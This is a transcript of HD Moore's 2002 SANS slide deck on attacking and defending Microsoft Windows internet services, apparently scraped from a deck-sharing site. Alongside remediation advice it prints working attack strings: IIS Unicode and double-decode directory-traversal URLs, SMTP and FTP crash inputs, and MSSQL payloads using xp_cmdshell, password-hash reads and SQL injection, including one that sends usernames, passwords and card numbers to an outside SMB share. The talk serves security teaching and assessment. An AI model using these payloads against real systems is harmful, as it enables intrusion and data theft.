Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Smashing Windows: Attacking & Defending Windows Internet Services

HD Moore
February 11, 2002

Smashing Windows: Attacking & Defending Windows Internet Services

This presentation covers common security issues in Microsoft Windows network services (IIS, SMTP, FTP, OWA, MSSQL).

HD Moore

February 11, 2002
Tweet

More Decks by HD Moore

Other Decks in Technology

Transcript

  1. SANS 2002 2 Introduction • H D Moore – Senior

    Analyst at Digital Defense – 5 years experience penetration testing – Contact: [email protected] • Digital Defense – Founded January 2000 – Provide recurring assessment services – Specialize in financial industry
  2. SANS 2002 3 Agenda – Quick Overview – Internet Information

    Server – Microsoft SMTP Service – Outlook Web Access – Microsoft FTP Service – Microsoft SQL Server – Demos / Questions
  3. 1/26/2016 SANS 2002 4 Quick Overview • Why should you

    sit through this? – Learn how crackers get in – Learn how to assess your own systems – See why network worms are so effective – Demonstrate why a patch needs to be applied – Actually verify that a patch worked – Check new software for related problems
  4. SANS 2002 5 Quick Overview • Why bother with assessing

    Windows? – Over 30% of all of web sites run on Windows – Popular online banking and e-commerce platform – Incredibly easy to install and start using – Most services have insecure default settings – Isn’t it secure with patches? Just wait a week…
  5. SANS 2002 7 IIS – Security Overview • What is

    IIS? – Microsoft’s Web Server Product – Standard component of Windows 2000+ – Aims to be easy to use and extend – Horrible security architecture – Most features are enabled by default – Every version to date has been vulnerable to a remote shell granting attack in its default configuration.
  6. SANS 2002 8 IIS - Usage • Where is IIS

    used? – Corporate Web Sites – E-Commerce Sites – Online Banking Systems – Intranet/Internal Sites – With other products • Sendmail for Windows – Various “appliances” • Cisco VOIP systems
  7. SANS 2002 9 IIS – Usage • Why is it

    used? – Provided with the operating system – Very user-friendly configuration – Large number of ASP/CF developers – Huge feature set, easy to extend – Integrates with a Windows network – Decent performance by comparison
  8. SANS 2002 10 IIS - Vulnerabilities • Three Primary Sources

    of Vulnerabilities – ISAPI Extensions • Code Red Worm – Sample Scripts • RDS Exploit – IIS Core • ::$DATA • Unicode • Double Decode
  9. SANS 2002 11 IIS – ISAPI Extensions • What is

    an ISAPI extension? – Adds functionality to IIS – Usually in the form of a DLL – ASP, CFML, PHP are extensions – Usually tied to specific suffix (.asp, .ida) • Types of security problems – Buffer Overflows – Information Disclosure
  10. SANS 2002 12 IIS – ISAPI Extensions • Why are

    they such a security risk? – Code is not as well reviewed as core IIS – Extensions are enabled by default – Extension code can execute as SYSTEM • Where are the extensions shown? – Open Internet Services Manager – Select Web Site -> Properties – Home Directory -> Configuration
  11. SANS 2002 14 IIS – ISAPI Vulnerabilities • Remote Code

    Execution – Overflow in ISM.dll (.htr) • Overflow in URL at ~3000 bytes • Exploit code was released 2 years ago • Only affects pre-SP6 IIS 4.0 servers – Overflow in IDQ.dll (.idq) • Overflow in Host header at ~220 bytes • “Code Red” used this to propagate • Affects both IIS 4.0 and 5.0
  12. SANS 2002 15 IIS – ISAPI Vulnerabilities • Remote Code

    Execution – Overflow in MSW3PRT.dll (.printer) • Overflow is in the Host: header at ~240 bytes • Exploit code in wide circulation and very effective • Affects Windows 2000 / IIS 5.0 only – Overflow in ActiveState PerlIIS.dll (.plx) • Overflow in URL at ~340 bytes • Exploit code in circulation • Affects ActiveState Perl 5.6.1 < build 630
  13. SANS 2002 16 IIS – ISAPI Vulnerabilities • Information Disclosure

    – Source disclosure with ISM.dll (.htr) • http://server/somescript.asp+.htr • http://server/somescript.asp?(%20 * 230).htr – Source disclosure with WEBHITS.dll (.htw) • http://server/null.htw?CiWebHitsFile=/default.asp%20
  14. SANS 2002 17 IIS – ISAPI Vulnerabilities • Information Disclosure

    – Physical path disclosure in IDQ.dll (.idq) • http://server/nonexistent.idq • http://server/nonexistent.ida – Physical path disclosure in HTTPODBC.dll (.idc) • http://server/nonexistent.idc
  15. SANS 2002 18 IIS – ISAPI Solutions • Remove Everything!

    (almost) – There are only a few extensions most people actually need: .asp, .asa, .shtml, .shtm. – Extensions like .php and .cfml are usually ok provided that they are at the latest patch level.
  16. SANS 2002 21 IIS – Sample Scripts • The problem

    with sample scripts – Demonstrate possibly dangerous features – Included as part of a default install – Have absolutely no access control – Unaffected by service packs and hotfixes – Often located in a different volume and added as a virtual directory, allowing other vulnerabilities to be further exploited.
  17. SANS 2002 22 IIS – Sample Scripts • Vulnerabilities in

    Sample Scripts – View Arbitrary files • Multiple ShowCode.asp scripts – Remote Database Access • The infamous /MSADC/msadcs.dll (RDS) • adctest.exe, mkilog.exe, ctss.idc – Guess/Change User Accounts • All the scripts in /IISADMPWD/ – Network Tunnels • Port relaying via /rpc/rpcproxy.dll
  18. SANS 2002 24 IIS – Sample Scripts • Sample Scripts

    - Solution – Actually delete sample files – Remove the Virtual Directories – Select “Custom Install” next time
  19. SANS 2002 25 IIS – Core • What problems exist

    in the core server? – File System Quirks – “Translate: f” Bug – Directory Traversal – IIS WebDav Features
  20. SANS 2002 26 IIS – Core • File System Quirks

    – DOS 8.3 File Names – Bypass IIS ACL’s • Affects pre-SP6 IIS 4.0 • http://server/protected/ ( becomes) • http://server/protec~1/ – NTFS File Streams – Access Source • Affects pre-SP6 IIS 4.0 • http://server/login.asp::$DATA
  21. SANS 2002 27 IIS – Core • “Translate: f” Bug

    – Retrieve the source of any file on the server: GET /global.asa\ HTTP/1.0 Translate: f – Affects Windows 2000 pre-SP1 only
  22. SANS 2002 28 IIS – Core • What is Directory

    Traversal? – Most file systems use two special directory names to refer to the current and parent directory. – A single period “.” refers to the current directory. – A double period “..” refers to the directory above. – Directory traversal bugs are dependent on these special directory names to access files outside of the defined root directory
  23. SANS 2002 29 IIS – Core • Directory Traversal –

    Win9x “…” – Windows 9x supports multiple-dot parent paths • http://server/……………/autoexec.bat • http://server/……/windows/command.com?echo+hello – Works on Win9x machines running IIS or PWS – Other web servers on Win9x have been vulnerable
  24. SANS 2002 30 IIS – Core • Directory Traversal –

    UNICODE – Windows supports a two-byte character encoding system called “UNICODE”. – Alternate character sets can used to make web requests by requesting their hexified values – The “/” and “\” characters can be represented with their UNICODE counterparts and older IIS versions will allow requests UNDER the web root. – Affects IIS 4.0 and IIS 5.0 – Other web servers may be affected
  25. SANS 2002 31 IIS – Core • Directory Traversal –

    UNICODE – Example: (%c0%af = “/”) • http://server/.. %c0%af.. %c0%af../boot.ini – Number of variations depends on installed langs – Possible to execute \winnt\system32\cmd.exe – Exploited by many different worms – Very popular exploit among “kids”
  26. SANS 2002 32 IIS – Core • Directory Traversal –

    Double Decode – Requests for files in an executable directory are hex-decoded twice and the final result is not checked for parent paths. – Example: • %25 = “%” AND %5c = “\” • Request: http://server/scripts/..%255c../ • First Decode: http://server/scripts/..%5c../ • Second Decode: http://server/scripts/..\../ – IIS 3.0, 4.0, 5.0 are affected
  27. SANS 2002 34 IIS – Core • IIS WebDav Features

    – DAV is Distributed Authoring and Versioning – WebDav provides content mgmt via HTTP – WebDav is accessed as HTTP methods – XML used for complex requests – A “normal” web request GET / HTTP/1.0 – A WebDav request PUT /newpage.html HTTP/1.0
  28. SANS 2002 35 IIS – Core • IIS WebDav Features

    – OPTIONS • OPTIONS / HTTP/1.0 • Returns a list of allowed HTTP methods • Methods in Allow: are accessible – SEARCH • Able to retrieve a directory listing through XML
  29. SANS 2002 36 IIS – Core • IIS WebDav Features

    – PUT • Common among misconfigured IIS 4.0 servers • Allows direct file uploads via WebDav (FrontPage) – DELETE • Common among misconfigured IIS 4.0 servers • Allows deletion of any file in the web root
  30. SANS 2002 37 IIS – Core • IIS WebDav Features

    – MOVE • Common among misconfigured IIS 4.0 servers • Allows you to move any file or directory – MKDIR/MKCOL • Only found on machines with really bad permissions • Allows creation of directories
  31. SANS 2002 38 IIS – Core • IIS WebDav Features

    – COPY • Most servers allow this, but it rarely works • Copy / HTTP/1.0 • Destination: http://nuthaserver/newdir/ – PROPFIND • Allowed by default • Needs XML input to do anything interesting • Various DoS attacks with long args to this command
  32. SANS 2002 39 IIS – Summary • A remote compromise

    is practically guaranteed by the number of vulnerabilities in a default installation. • Microsoft’s “feature push” strategy to encourage upgrades ensures there will be always be new vulnerabilities. • The amount of effort, knowledge, and time required to effectively secure an IIS server means that only experienced, security-aware administrators, have a chance of succeeding. • Microsoft is making attempts to simplify the assessment and patching process by releasing free security tools.
  33. “I send you this file in order to have your

    advice” - Sircam Worm IMS Microsoft Internet Mail Service
  34. SANS 2002 42 IMS – Security Overview • What is

    IMS? – IMS supports the Simple Mail Transport Protocol – Part of Windows NT 4.0 Option Pack – Comes standard with Windows 2000 – Aims to be easy to use and configure – Often overlooked when it comes to security
  35. SANS 2002 43 IMS – Security Overview • What problems

    exist? – Unauthorized Mail Relaying – Denial of Service Attacks – Information Gathering
  36. SANS 2002 44 IMS - Vulnerabilities • Unauthorized Mail Relaying

    – Misconfigured Mail Servers • Verify that relaying is turned off or at least properly configured – Windows 2000 SMTP Auth Bypass • AUTH GSSAPI
  37. SANS 2002 45 IMS – Vulnerabilities • Denial of Service

    Attacks – IMS + Exchange 5.5 Empty Character Set • Email with: charset = “” – Windows 2000 BDAT/AUTH Crash • BDAT 4\r\nb00mAUTH LOGIN\r\n\r\n\r\n\r\n
  38. SANS 2002 46 SMTP – Vulnerabilities • Information Gathering –

    “Bounce” messages can contain sensitive information about a company’s internal network and domain – The AUTH and XAUTH commands can be used to brute-force user accounts through SMTP
  39. SANS 2002 47 SMTP – Summary • Many SMTP servers

    are misconfigured or buggy in a way that allows spam relaying. • The SMTP service can be used to gather sensitive information about a network • While a few DoS conditions exist, newer versions of Windows automatically restart a crashed service.
  40. SANS 2002 50 OWA – Security Overview • What is

    Outlook Web Access? – Web mail client for Microsoft Exchange – Runs on top of IIS 4.0 or 5.0 – Emulates the Outlook interface – Written in ASP, uses COM+ objects
  41. SANS 2002 51 OWA – Security Overview • What problems

    exist? – All IIS vulnerabilities apply – Defaults to clear text HTTP transport – Anonymous access enabled by default – Allows exploitation of client-side bugs
  42. SANS 2002 52 OWA – Vulnerabilities • OWA runs on

    IIS – Many people forget to include OWA machines when applying patches to their “web servers” – Crackers and worms don’t care what it is, as long as it’s running the IIS web server – Cracking the OWA machine provides full access to login and mail ASP scripts
  43. SANS 2002 53 OWA – Vulnerabilities • Defaults to Clear

    Text – Many people run OWA across regular HTTP, allowing their login and email to be easily sniffed – Enabling SSL is not too difficult, provided you know how to configure SSL under IIS.
  44. SANS 2002 54 OWA – Vulnerabilities • Anonymous Access by

    Default – A default install allows full access to the Global Address List to unauthenticated users – “Public Folders” are exactly that, viewable by anyone able to access the server
  45. SANS 2002 55 OWA – Vulnerabilities • Exploitation of Client

    Side Bugs – It is possible to embed a hostile application into an email message and force it to run when a user reads their email via Internet Explorer – There are various “Cross Site Scripting” issues with OWA which could allow someone to read any cookies or email contents
  46. SANS 2002 56 OWA – Summary • Outlook Web Access

    is a fairly dangerous application to maintain just to provide access to email over the web. • The actual OWA scripts have been proven to be pretty solid, most of the issues are with the underlying IIS server or the default config. • If you do run OWA, please stay on top of IIS patches, disable anonymous access, and keep sensitive information out of “Public Folders”
  47. SANS 2002 59 FTP – Security Overview • What is

    the FTP service? – The File Transfer Protocol – THE method of transmitting stored files – Part of Windows NT 4.0 Option Pack – Comes standard with Windows 2000 – Easy to configure and use
  48. SANS 2002 60 FTP – Security Overview • What problems

    exist? – Unencrypted login and transfer – Anonymous access by default – Predictable PASV port selection – SITE STATS information leak – STAT Globbing Attack
  49. SANS 2002 61 FTP – Vulnerabilities • Unencrypted login and

    transfer – Authentication information is sent in clear text and trivial to capture – The actual file transfers are unencrypted and easy to sniff and extract
  50. SANS 2002 62 FTP – Vulnerabilities • Anonymous Access by

    Default – The default installation allows access using the standard “anonymous” and “ftp” account – Systems with bad permissions for the FTP root are automatically turned into warez servers for the various pirate groups
  51. SANS 2002 63 FTP – Vulnerabilities • Predictable PASV Port

    – FTP uses one connection from the client to port 21 on the server as the “control” port – Directory listings and file transfers are done via a second connection – Active FTP uses a connection from the server to the client – Passive FTP opens a port on the server and the client connects to it
  52. SANS 2002 64 FTP – Vulnerabilities • Predictable PASV Port

    – Many FTP servers use single-incrementing port numbers for the “passive” data port – With MS FTP 4.0, it is possible to guess the next data port and steal another user’s file transfer – With MS FTP 5.0, a hijack attempt will just disconnect and the client’s FTP session becomes unusable – Automated tools exist to exploit this
  53. SANS 2002 65 FTP – Vulnerabilities • SITE STATS Information

    Leak – The SITE STATS feature shows how many times each FTP command has been executed – An anonymous user can profile a FTP server to determine when other users are logging on – The statistics can reveal what privileged commands are being executed and at what time – Usage profiles can be used in conjunction with the PASV port attack to steal scheduled transfers
  54. SANS 2002 66 FTP – Vulnerabilities • SITE STATS Information

    Leak – Sample output from ftp.XiXroXoXt.com DELE : 19993 MKD : 12260 RETR : 4157300 STOR : 34736 USER : 5829438 PASS : 5792087
  55. SANS 2002 67 FTP – Vulnerabilities • STAT Globbing Attack

    – MS notified early Dec. – No fix available yet – MS FTP 4.0 and 5.0 vulnerable – Crashes ALL IIS services • STAT *?<A x 240> – Possibly exploitable
  56. SANS 2002 68 FTP – Summary • The FTP protocol

    was never designed with security in mind. • The secondary data channel does not require authentication and is trivial to hijack. • If you must run FTP, please encrypt AND sign your files before transferring.
  57. SANS 2002 71 MSSQL – Security Overview • What is

    SQL Server? – Microsoft’s relational database product – Originally based on the Sybase engine – Often installed with other products – Ships by default on many vendor machines – “Personal” editions exist for client systems – Popular backend for web applications • E-Commerce • Financial Services
  58. SANS 2002 72 MSSQL – Security Overview • Security Issues

    – Service runs as Administrator or SYSTEM – Default accounts are the biggest problem – SQL User Level Privilege Escalation – Service is easily located on the network – Dangerous Stored Procedures – Syntax optimal for SQL insertion attacks
  59. SANS 2002 73 MSSQL – Vulnerabilities • Service Runs as

    Administrator or SYSTEM – A compromise of the “sa” account results in full access to the entire system – Any bugs in the listening service or query parser could result in a complete system compromise
  60. SANS 2002 74 MSSQL – Vulnerabilities • Default Accounts are

    the Biggest Problem – The all-powerful “sa” account often has no password set, newer versions try to force it. – The “probe” account in 6.5 is unprivileged, but gaining “sa” access is trivial in that version. – A network worm appeared in late November 2001, exploiting the default “sa” account and propagating via stored procedures.
  61. SANS 2002 75 MSSQL – Vulnerabilities • SQL User Level

    Privilege Escalation – SQL 7.0 Trusted Connections SELECT * FROM OPENROWSET('SQLOLEDB', 'Trusted_Connection=Yes;Data Source=myserver', 'SET FMTONLY OFF execute master..xp_cmdshell "dir c:\"') – Buffer overflows in Extended Stored Procedures
  62. SANS 2002 76 MSSQL – Vulnerabilities • Service is Easily

    Located on the Network – Use the SQLPing utility – Use osql -L – SQL Server can use these transports: • TCP/IP(TCP 1433, UDP 1433, 1434) • MS RPC (dynamic ports) • Named Pipes • IPX/SPX / AppleTalk / Banyan Vines
  63. SANS 2002 77 MSSQL – Vulnerabilities • Dangerous Stored Procedures

    – The infamous xp_cmdshell EXEC master..xp_cmdshell “cmd.exe /c …” – Sending query results back to you via SMB EXEC master..sp_makewebtask “\\ip\tmp\test.html”, “SELECT username, password,cc from users” – Dump the SAM password hashes via xp_regread EXEC xp_regread HKLM, 'SECURITY\SAM\Domains\Account ','F'
  64. SANS 2002 78 MSSQL – Vulnerabilities • Syntax Optimal for

    SQL Insertion Attacks – Queries can be stacked via semi-colon SELECT * FROM cats WHERE id = 4; UPDATE USER SET … – Comments can be inserted inline SELECT * FROM users WHERE user = ‘bob’;-- ‘ AND password = “bad password” – The engine provides verbose error messages about SQL syntax problems
  65. SANS 2002 79 MSSQL – Summary • Compromising the “sa”

    account is almost always equivalent to having local Administrator access to the SQL Server machine (hint: don’t run a database on your DC’s). • Since SQL Server supports so many different network protocols, a simple packet filter on ports 1433/1434 is usually not enough to restrict access. • Recent versions of MS-SQL (2k+) are slightly more secure out of the box, the “Typical” install only allows Domain Authentication.